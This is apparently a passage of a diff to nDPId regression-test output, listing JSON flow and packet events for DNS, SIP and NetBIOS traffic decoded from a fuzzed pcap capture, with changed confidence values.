0K"} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1120470050187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470050187,"pkt":"ADBUADRWAODtAW69CABFAABIanEAAFgRTODAqAECwKgBAQq8ADUANCxC\/cYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAB0AAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470049190,"flow_last_seen":1120470050187,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470050187,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":116,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470049190,"flow_last_seen":1120470050187,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470050187,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":116,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 01546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1120470050699,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"thread_ts_msec":1120470050699,"pkt":"ADBUADRWAODtAdO9CABFAANSanIAAIARyujAqAECyER4URPEE8QDPvKbSU5WSVRFIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI6NTA2MDticmFmY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2lwLmJydXJqdWxhLm5ldD47dGFnPTY0MzNlZjkNClRvOiA8c2lwOjk3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDUwOTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgSU5W6FRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3NkcA0KQm9udGVudC1MZW5ndGg6IDI3Mg0KQ29udGFjdDogPHNpcDo4MTY2NjZAMTMyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllF2SBSRUZFUiwgT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQUyAxMDUwMTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLjE2OC4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRwbWFwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgRzcyNi0zMi84MDAwDQphPXJ0cG1hcDozIEdTTS84MDA0DQphPWZtdHA6OTcgbW9kZT0yMA0KYT1zZW5kcmVjdg0K"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470049696,"flow_last_seen":1120470050699,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470050699,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470049696,"flow_last_seen":1120470050699,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470050699,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 01246{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1120470051405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":637,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":637,"pkt_l4_len":603,"thread_ts_msec":1120470051405,"pkt":"AODtAW69ADBUADRWCABFAAJvAABAAC8RRz7IRHhRwKgBAhPEE8QCWxwoU0lQL3guMCAxMDAgdHJ5aW5nIC0tIHlvdXIgY2FsbCBpcyBpbXBvcnRhbnQgdG8gdXMNClZpYTogU0lQLzIuMC9VRFAgMTkyLnE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQ9NTA2MDtyZWNlaXZlZD04MC4yMzAuMjE5LjcwDQpGcm9tOiAiYXJpayIgPHNpcDo4MTY2NjZAdm9pcC5icnVyanVsYS5uZXQ+O3RhZz02NDMzZWY5DQpUbzptPHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0Pg0KQ2FsbC1JRDogMTA1MDkwMjU5LTQ0NmZhZjdhQDEZMi4lcxAuMS4yDUdDU2VxOiAxIElOVklURQ0KU2VydmVyOiAlcwAgRVhwcmVzcyByb3V0ZXIgKDAuOC4xgCAoaaY4Ni9saSVzACkpDQpDb250ZW50LUxlbmclcwAgMA0KV2FybmluZzogMzkyIDIwMC42OC4xMjAuODE6NTA2MCAiTm9pc3kgZmVlZGJhY2sgdGVsbHM6ICBwaWQ5MzI2NDIgcmVxX3NyY19pcD04MC4yMzAuMjE5LjcwIHJlcV9zcmNfcG9ydD01MDYwIGluX3VyaT1zaXA6OTcyMzkyODcwNDRAdm9pcC5icnVqdWxhLm5ldCBvdXRfdXJpPXNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IHZpYR9jbnQ9PTEiDQoNCg=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":1120470052189,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470052189,"pkt":"ADBUADRWAODtAW69CABFAABIanMAAIARTN7AqAECwKgBAQq8ADUANCxC\/cYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470049190,"flow_last_seen":1120470052189,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470052189,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470049190,"flow_last_seen":1120470058198,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470049190,"flow_last_seen":1120470052189,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470052189,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470049190,"flow_last_seen":1120470058198,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469877188,"flow_last_seen":1120469877188,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":169,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469877188,"flow_last_seen":1120469877188,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":169,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470066200,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1120470066200,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470066200,"pkt":"ADBUADRWAODtMm69CABFAABEangAAIARTN3AqAECwKgBAQq9ADUAMAo6GsgAAAABAFmqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470066200,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470066200,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1120470066201,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470066201,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cq0AR+y1GsiAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":238,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":10240,"global_ts_msec":1120470066203} 00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":238,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":10240,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470066201,"pkt":"ADBUADRWAODtAW69KABFAAAhankAAIARGJPAqAEC1PIhIxPEE8QADcBLICAgICA="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1120470066293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470066293,"pkt":"ADBUADRWAODtAW69CABFAABIanoAAIARTNfAqAECwKgBAQq+ADUANBAIP8gBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1120470067291,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470067291,"pkt":"ADBUADRWAODtAW69CABFAABIanwAAIARTNXAqAECwKgBAQq+ADUANBAIP8gBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470069294,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1120470069294,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470069294,"pkt":"ADBUADRWAODtAW69CABFAABIan0AAIARTNTAqAECwKgBASq+ADUANBAIP8gBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470069294,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470069294,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 